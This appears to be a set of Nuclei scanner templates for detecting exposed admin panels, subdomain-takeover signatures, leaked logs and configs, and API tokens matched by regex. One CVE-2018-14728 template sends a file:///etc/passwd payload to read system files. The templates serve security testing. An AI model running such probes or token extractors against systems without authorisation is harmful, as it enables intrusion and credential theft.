info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/hmc/hybris" 13 | - "{{BaseURL}}/hybris/hmc/hybris" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "hybris Management Console" 19 | part: body 20 | -------------------------------------------------------------------------------- /exposed-panels/sonicwall-management-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-management-panel 2 | 3 | info: 4 | name: SonicWall Management Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/auth.html" 13 | matchers: 14 | - type: word 15 | words: 16 | - "SonicWall - Authentication" 17 | - "SonicWall Administrator" 18 | -------------------------------------------------------------------------------- /exposures/files/lazy-file.yaml: -------------------------------------------------------------------------------- 1 | id: lazy-file-manager 2 | 3 | info: 4 | name: Lazy File Manager 5 | author: amsda 6 | severity: medium 7 | tags: exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/lfm.php" 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | 19 | - type: word 20 | words: 21 | - Lazy File Manager -------------------------------------------------------------------------------- /exposures/tokens/mailchimp/mailchimp-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-access-key-value 2 | 3 | info: 4 | name: Mailchimp API Value 5 | author: puzzlepeaches 6 | severity: info 7 | tags: exposure,token,mailchimp 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "[0-9a-f]{32}-us[0-9]{1,2}" 19 | -------------------------------------------------------------------------------- /exposures/tokens/paypal/braintree-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: braintree-access-token 2 | 3 | info: 4 | name: PayPal Braintree Access Token Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}' -------------------------------------------------------------------------------- /takeovers/bigcartel-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: bigcartel-takeover 2 | 3 | info: 4 | name: Bigcartel Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | matchers: 15 | - type: word 16 | words: 17 | - "

Oops! We couldn’t find that page.

" -------------------------------------------------------------------------------- /takeovers/helpscout-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: helpscout-takeover 2 | 3 | info: 4 | name: helpscout takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "No settings were found for this company:" -------------------------------------------------------------------------------- /exposed-panels/django-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: django-admin-panel 2 | 3 | info: 4 | name: Python Django Admin Panel 5 | author: pdteam 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/login/?next=/admin/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Django administration" 17 | condition: and 18 | part: body -------------------------------------------------------------------------------- /exposed-panels/jenkins-login.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-login 2 | 3 | info: 4 | name: Jenkins Login 5 | author: pdteam 6 | severity: info 7 | tags: panel,jenkins 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/login' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Sign in [Jenkins]' 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml: -------------------------------------------------------------------------------- 1 | id: newrelic-synthetics-location-key 2 | 3 | info: 4 | name: Synthetics Location Key Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?i)NRSP-[a-z]{2}[0-9]{2}[a-f0-9]{31}' -------------------------------------------------------------------------------- /exposures/tokens/zapier/zapier-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: zapier-webhook-token 2 | 3 | info: 4 | name: Zapier Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/' -------------------------------------------------------------------------------- /network/sap-router.yaml: -------------------------------------------------------------------------------- 1 | id: sap-router 2 | 3 | info: 4 | name: SAPRouter Detection 5 | author: randomstr1ng 6 | severity: info 7 | tags: network,sap 8 | 9 | network: 10 | - inputs: 11 | - data: 57484f415245594f553f0a 12 | type: hex 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Hostname}}:3299" 17 | read-size: 1024 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "SAProuter" -------------------------------------------------------------------------------- /takeovers/airee-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: airee-takeover 2 | 3 | info: 4 | name: Airee Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | name: airee 18 | words: 19 | - 'Ошибка 402. Сервис Айри.рф не оплачен' -------------------------------------------------------------------------------- /takeovers/ngrok-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: ngrok-takeover 2 | 3 | info: 4 | name: ngrok takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - ngrok.io not found 19 | - Tunnel *.ngrok.io not found -------------------------------------------------------------------------------- /technologies/default-iis7-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-iis7-page 2 | 3 | info: 4 | name: IIS-7 Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,iis 8 | reference: https://www.shodan.io/search?query=http.title%3A%22IIS7%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "IIS7" 18 | part: body 19 | -------------------------------------------------------------------------------- /cves/2018/CVE-2018-7251.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-7251 2 | 3 | info: 4 | name: AnchorCMS Error Log Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: cve,cve2018,anchorcms,logs 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/anchor/errors.log' 13 | matchers: 14 | - type: word 15 | words: 16 | - '"date":' 17 | - '"message":' 18 | - '"trace":[' 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposed-panels/somfy-login.yaml: -------------------------------------------------------------------------------- 1 | id: somfy-login 2 | 3 | info: 4 | name: Somfy Login Page 5 | author: DhiyaneshDK 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/m_login.htm' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Home motion by Somfy 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposures/tokens/artifactory/artifactory-api-password.yaml: -------------------------------------------------------------------------------- 1 | id: artifactory-api-password 2 | 3 | info: 4 | name: Artifactory Password Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,artifactory 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}' -------------------------------------------------------------------------------- /exposures/tokens/google/google-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: google-api-key 2 | 3 | info: 4 | name: Google API Key 5 | author: Swissky 6 | severity: info 7 | tags: exposure,token,google 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/hopfully404" 14 | 15 | extractors: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "AIza[0-9A-Za-z\\-_]{35}" 20 | -------------------------------------------------------------------------------- /iot/network-camera-detect.yaml: -------------------------------------------------------------------------------- 1 | id: network-camera-detect 2 | 3 | info: 4 | name: Various Online Devices Detection (Network Camera) 5 | author: iamthefrogy 6 | severity: info 7 | tags: iot 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/CgiStart?page=Single" 13 | redirects: true 14 | max-redirects: 2 15 | matchers: 16 | - type: word 17 | words: 18 | - Network Camera 19 | -------------------------------------------------------------------------------- /misconfiguration/phpmyadmin-setup.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-setup 2 | 3 | info: 4 | name: phpMyAdmin setup page 5 | author: thevillagehacker 6 | severity: medium 7 | tags: phpmyadmin 8 | reference: https://hackerone.com/reports/297339 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/phpmyadmin/setup/index.php" 14 | matchers: 15 | - type: word 16 | words: 17 | - "phpMyAdmin setup" 18 | -------------------------------------------------------------------------------- /exposed-panels/citrix-adc-gateway-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-adc-gateway-panel 2 | 3 | info: 4 | name: Citrix ADC Gateway detect 5 | author: organiccrap 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/logon/LogonPoint/index.html' 13 | - '{{BaseURL}}/logon/LogonPoint/custom.html' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - '_ctxstxt_CitrixCopyright' -------------------------------------------------------------------------------- /exposed-panels/fortinet-fortigate-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fortinet-fortigate-panel 2 | 3 | info: 4 | name: Fortinet FortiGate SSL VPN Panel 5 | author: bsysop 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/remote/login" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "/remote/fgt_lang" 20 | part: body 21 | -------------------------------------------------------------------------------- /exposed-panels/lancom-router-panel.yaml: -------------------------------------------------------------------------------- 1 | id: lancom-router-panel 2 | 3 | info: 4 | name: Lancom Router Panel 5 | author: __Fazal 6 | severity: info 7 | tags: panel,lancom 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "LANCOM 1790VA-4G" -------------------------------------------------------------------------------- /exposures/tokens/google/fcm-server-key.yaml: -------------------------------------------------------------------------------- 1 | id: fcm-server-key 2 | 3 | info: 4 | name: FCM Server Key 5 | author: absshax 6 | severity: high 7 | tags: exposure,token,google 8 | reference: https://abss.me/posts/fcm-takeover 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | extractors: 16 | - type: regex 17 | part: body 18 | regex: 19 | - "AAAA[a-zA-Z0-9_-]{7}:[a-zA-Z0-9_-]{140}" -------------------------------------------------------------------------------- /exposures/tokens/google/google-calendar-link.yaml: -------------------------------------------------------------------------------- 1 | id: google-calendar-link 2 | 3 | info: 4 | name: Google Calendar URI Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,google 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'https://www\.google\.com/calendar/embed\?src=[A-Za-z0-9%@&;=\-_\./]+' -------------------------------------------------------------------------------- /takeovers/brightcove-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: brightcove-takeover 2 | 3 | info: 4 | name: brightcove takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - '

Error Code: 404

' -------------------------------------------------------------------------------- /takeovers/pantheon-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pantheon-takeover 2 | 3 | info: 4 | name: pantheon takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "The gods are wise, but do not know of the site which you seek." -------------------------------------------------------------------------------- /takeovers/uberflip-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: uberflip-takeover 2 | 3 | info: 4 | name: uberflip takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Non-hub domain, The URL you've accessed does not provide a hub." -------------------------------------------------------------------------------- /workflows/magmi-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: magmi-workflow 2 | 3 | info: 4 | name: MAGMI Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all MAGMI related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/magmi-detect.yaml 10 | subtemplates: 11 | - template: cves/2017/CVE-2017-7391.yaml 12 | - template: cves/2020/CVE-2020-5776.yaml 13 | - template: cves/2020/CVE-2020-5777.yaml -------------------------------------------------------------------------------- /exposed-panels/sap-hana-xsengine-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sap-hana-xsengine-panel 2 | 3 | info: 4 | name: SAP HANA XSEngine Admin Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sap/hana/xs/formLogin/login.html" 13 | redirects: true 14 | matchers: 15 | - type: word 16 | words: 17 | - "/sap/hana/xs/formLogin/images/sap.png" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposures/configs/airflow-configuration-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-configuration-exposure 2 | 3 | info: 4 | name: Apache Airflow Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: exposure,config,airflow,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/airflow.cfg' 13 | matchers: 14 | - type: word 15 | words: 16 | - '[core]' 17 | - '[api]' 18 | condition: and -------------------------------------------------------------------------------- /exposures/logs/elmah-log-file.yaml: -------------------------------------------------------------------------------- 1 | id: elmah-log-file 2 | 3 | info: 4 | name: elmah.axd Disclosure 5 | author: shine 6 | severity: medium 7 | tags: logs,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/elmah.axd" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - 'Error Log for' 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /exposures/tokens/cloudinary/cloudinary-credentials.yaml: -------------------------------------------------------------------------------- 1 | id: cloudinary-credentials 2 | 3 | info: 4 | name: Cloudinary Credentials Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,cloudinary 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - 'cloudinary://[0-9]+:[A-Za-z0-9\-_\.]+@[A-Za-z0-9\-_\.]+' -------------------------------------------------------------------------------- /miscellaneous/dir-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dir-listing 2 | 3 | info: 4 | name: Directory listing enabled 5 | author: _harleo,pentest_swissky 6 | severity: info 7 | tags: misc,generic 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Directory listing for" 17 | - "Index of /" 18 | - "[To Parent Directory]" 19 | - "Directory: /" 20 | -------------------------------------------------------------------------------- /misconfiguration/cx-cloud-upload-detect.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-upload-detect 2 | 3 | info: 4 | name: CX Cloud Unauthenticated Upload Detect 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: upload 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/upload.jsp' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Display file upload form to the user" 17 | condition: and 18 | -------------------------------------------------------------------------------- /misconfiguration/exposed-kafdrop.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-kafdrop 2 | 3 | info: 4 | name: Publicly exposed Kafdrop Interface 5 | author: dhiyaneshDk 6 | severity: low 7 | tags: exposure,misconfig 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Kafdrop: Broker List" 18 | - "Kafka Cluster Overview" 19 | condition: and 20 | -------------------------------------------------------------------------------- /takeovers/anima-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: anima-takeover 2 | 3 | info: 4 | name: Anima Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "If this is your website and you've just created it, try refreshing in a minute" -------------------------------------------------------------------------------- /takeovers/simplebooklet-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: simplebooklet-takeover 2 | 3 | info: 4 | name: simplebooklet takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - We can't find this Apache Tomcat" 18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/telerik-fileupload-detect.yaml: -------------------------------------------------------------------------------- 1 | id: telerik-fileupload-detect 2 | 3 | info: 4 | name: Detect Telerik Web UI fileupload handler 5 | author: organiccrap 6 | severity: info 7 | tags: tech,telerik 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "RadAsyncUpload handler is registered succesfully" 18 | -------------------------------------------------------------------------------- /cves/2018/CVE-2018-14728.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-14728 2 | 3 | info: 4 | name: Responsive filemanager 9.13.1 - SSRF/LFI 5 | author: madrobot 6 | severity: high 7 | tags: cve,cve2018,ssrf,lfi 8 | 9 | requests: 10 | - method: POST 11 | path: 12 | - "{{BaseURL}}/filemanager/upload.php" 13 | 14 | body: "fldr=&url=file:///etc/passwd" 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - "root:.*:0:0:" 20 | part: body 21 | -------------------------------------------------------------------------------- /dns/worksites-detection.yaml: -------------------------------------------------------------------------------- 1 | id: detect-worksites 2 | 3 | info: 4 | name: worksites.net service detection 5 | author: melbadry9 6 | severity: info 7 | tags: dns 8 | reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites 9 | 10 | dns: 11 | - name: "{{FQDN}}" 12 | type: A 13 | class: inet 14 | recursion: true 15 | retries: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "69.164.223.206" 20 | -------------------------------------------------------------------------------- /exposed-panels/ambari-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: ambari-exposure 2 | 3 | info: 4 | name: Apache Ambari Exposure / Unauthenticated Access 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Ambari' 18 | - 'href="http://www.apache.org/licenses/LICENSE-2.0"' 19 | condition: and -------------------------------------------------------------------------------- /exposed-panels/rstudio-detect.yaml: -------------------------------------------------------------------------------- 1 | id: rstudio-detect 2 | 3 | info: 4 | name: RStudio panel detector 5 | author: philippedelteil 6 | severity: info 7 | tags: panel,rstudio 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - 'RStudio' 18 | part: header 19 | - type: status 20 | status: 21 | - 302 22 | -------------------------------------------------------------------------------- /exposed-panels/sharecenter-login.yaml: -------------------------------------------------------------------------------- 1 | id: sharecenter-login 2 | 3 | info: 4 | name: ShareCenter Login Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6892 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "ShareCenter" 18 | - "Please Select Your Account" 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposed-panels/xenforo-login.yaml: -------------------------------------------------------------------------------- 1 | id: xenforo-login 2 | 3 | info: 4 | name: XenForo Login/Register 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.shodan.io/search?query=http.title%3A%22XenForo%22 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/index.php' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'XenForo' 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposures/tokens/slack/slack-webhook-token.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook-token 2 | 3 | info: 4 | name: Slack Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,slack 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "https://hooks\\.slack\\.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}" -------------------------------------------------------------------------------- /network/expn-mail-detect.yaml: -------------------------------------------------------------------------------- 1 | id: expn-mail-detect 2 | 3 | info: 4 | name: EXPN Mail Server Detect 5 | author: r3dg33k 6 | severity: info 7 | tags: mail,expn,network 8 | 9 | network: 10 | - inputs: 11 | - data: "65686c6f20636865636b746c730a" 12 | type: hex 13 | read-size: 2048 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Hostname}}:25" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "250-EXPN" -------------------------------------------------------------------------------- /technologies/fanruanoa2012-detect.yaml: -------------------------------------------------------------------------------- 1 | id: fanruanoa2012-detect 2 | 3 | info: 4 | name: FanRuanOA2012-detect 5 | author: YanYun 6 | severity: info 7 | tags: oa,java,fanruan,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - 'down.download?FM_SYS_ID' -------------------------------------------------------------------------------- /workflows/cisco-asa-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: cisco-asa-workflow 2 | 3 | info: 4 | name: Cisco ASA Security Checks 5 | author: flag007 6 | description: A simple workflow that runs all Cisco related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/cisco-asa-panel.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-3187.yaml 12 | - template: cves/2020/CVE-2020-3452.yaml 13 | - template: cves/2018/CVE-2018-0296.yaml -------------------------------------------------------------------------------- /exposed-panels/cisco-asa-panel.yaml: -------------------------------------------------------------------------------- 1 | id: cisco-asa-panel-detect 2 | 3 | info: 4 | name: Cisco ASA VPN panel detect 5 | author: organiccrap 6 | severity: info 7 | tags: cisco,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/+CSCOE+/logon.html" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: word 18 | words: 19 | - "SSL VPN Service" 20 | part: body 21 | -------------------------------------------------------------------------------- /exposed-panels/clave-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: clave-login-panel 2 | 3 | info: 4 | name: Clave login panel 5 | author: __Fazal 6 | severity: info 7 | tags: panel,clave 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin.php' 13 | 14 | redirects: true 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - "Clave" -------------------------------------------------------------------------------- /exposed-panels/hivemanager-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: hivemanager-login-panel 2 | info: 3 | name: HiveManager Login panel 4 | author: binaryfigments 5 | severity: info 6 | tags: panel 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/hm/login.action' 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - "HiveManager Login" 17 | - type: status 18 | status: 19 | - 200 20 | -------------------------------------------------------------------------------- /exposed-panels/netlify-cms.yaml: -------------------------------------------------------------------------------- 1 | id: netlify-cms 2 | 3 | info: 4 | name: Netlify CMS Admin Panel 5 | author: sullo 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/index.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Netlify CMS" 22 | part: body 23 | -------------------------------------------------------------------------------- /exposed-panels/netscalar-aaa-login.yaml: -------------------------------------------------------------------------------- 1 | id: netscalar-aaa-login 2 | 3 | info: 4 | name: NetScalar AAA Login Panel 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6898 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/logon/LogonPoint/tmindex.html' 14 | matchers: 15 | - type: word 16 | words: 17 | - "NetScaler AAA" 18 | condition: and 19 | -------------------------------------------------------------------------------- /exposed-panels/workspace-one-uem.yaml: -------------------------------------------------------------------------------- 1 | id: workspace-one-uem 2 | 3 | info: 4 | name: Workspace ONE UEM AirWatch Login Page 5 | author: gevakun 6 | severity: info 7 | reference: https://twitter.com/Jhaddix/status/1295861505963909120 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/AirWatch/Login" 14 | matchers: 15 | - type: word 16 | words: 17 | - "About VMware AirWatch" 18 | part: body 19 | -------------------------------------------------------------------------------- /exposures/tokens/amazon/aws-access-key-value.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key-value 2 | 3 | info: 4 | name: AWS Access Key ID Value 5 | author: Swissky 6 | severity: info 7 | tags: exposure,token,aws,amazon 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 19 | -------------------------------------------------------------------------------- /network/java-rmi-detect.yaml: -------------------------------------------------------------------------------- 1 | id: java-rmi-detect 2 | 3 | info: 4 | name: Detect Java RMI Protocol 5 | author: F1tz 6 | severity: info 7 | tags: network,rmi 8 | 9 | network: 10 | - inputs: 11 | - data: "{{hex_decode('4a524d4900024b')}}" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | read-size: 1024 16 | 17 | matchers: 18 | - type: regex 19 | part: raw 20 | regex: 21 | - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" -------------------------------------------------------------------------------- /takeovers/getresponse-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: getresponse-takeover 2 | 3 | info: 4 | name: getresponse takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'With GetResponse Landing Pages, lead generation has never been easier' -------------------------------------------------------------------------------- /technologies/default-jetty-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-jetty-page 2 | 3 | info: 4 | name: Jetty Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,jetty 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Powered+By+Jetty%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Powered By Jetty" 18 | part: body 19 | 